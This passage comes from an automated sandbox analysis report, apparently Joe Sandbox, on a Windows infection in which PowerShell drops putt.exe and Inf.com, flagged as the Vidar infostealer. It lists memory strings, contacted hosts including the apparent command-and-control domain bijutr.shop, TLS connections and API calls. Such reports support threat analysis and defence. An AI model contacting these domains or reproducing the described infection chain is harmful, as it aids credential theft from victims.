                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                    Source: msedge.exe, 00000022.00000002.3389500036.0000024C6B35E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comse
                    Source: Inf.com, 0000001A.00000002.3405131990.000000000422D000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.000000000425C000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.0000000004209000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.000000000437F000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.00000000042BD000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.000000000438C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/#
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/Data
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/LE
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/S
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/TE
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/h$
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/op
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/opX
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/p-
                    Source: Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/x
                    Source: Inf.com, 0000001A.00000002.3405131990.000000000438C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop7GLNG4
                    Source: Inf.com, 0000001A.00000002.3405131990.0000000004209000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopIEC2DB1D--
                    Source: Inf.com, 0000001A.00000002.3405131990.000000000438C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shoppData
                    Source: Inf.com, 0000001A.00000002.3405131990.00000000042BD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shops.exe
                    Source: Inf.com, 0000001A.00000002.3405131990.000000000425C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopsh;
                    Source: Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, 37Q1NG.26.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: offscreendocument_main.js.35.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                    Source: chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                    Source: chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                    Source: Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: chrome.exe, 00000020.00000003.3175267436.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000002.3394790116.00007CC800194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: chrome.exe, 00000020.00000003.3179742032.00005B3802F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175094763.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3184755862.00005B3802F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175834331.00005B3802EFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178580186.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175267436.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                    Source: chrome.exe, 00000020.00000003.3158863745.00007BD4006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                    Source: chrome.exe, 00000020.00000003.3158863745.00007BD4006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49748 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49789 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49817 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49837 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49892 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49902 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49915 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49921 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49954 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0076F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0076F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00789FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                    System Summary

                    Source: 26.2.Inf.com.41e0000.1.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\putt.exe
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0070FFE0 CloseHandle,NtProtectVirtualMemory
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00764763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00751B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0075F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe File created: C:\Windows\NortheastPresence
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe File created: C:\Windows\FascinatingFee
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe File created: C:\Windows\FinishedMistress
                    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\putt.exe 0F9003739FC0213FF837F03F9C1CE4C835E3AAB255C94D388AEFB9D9B985CB2D
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: String function: 004062CF appears 58 times
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: String function: 0070FD52 appears 40 times
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: String function: 00710DA0 appears 46 times
                    Source: 26.2.Inf.com.41e0000.1.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@91/168@25/12
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_007641FA GetLastError,FormatMessageW
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00752010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00751A0B AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0075DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_004024FB CoCreateInstance
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00763A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Authorization
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30xceyeq.gzk.ps1
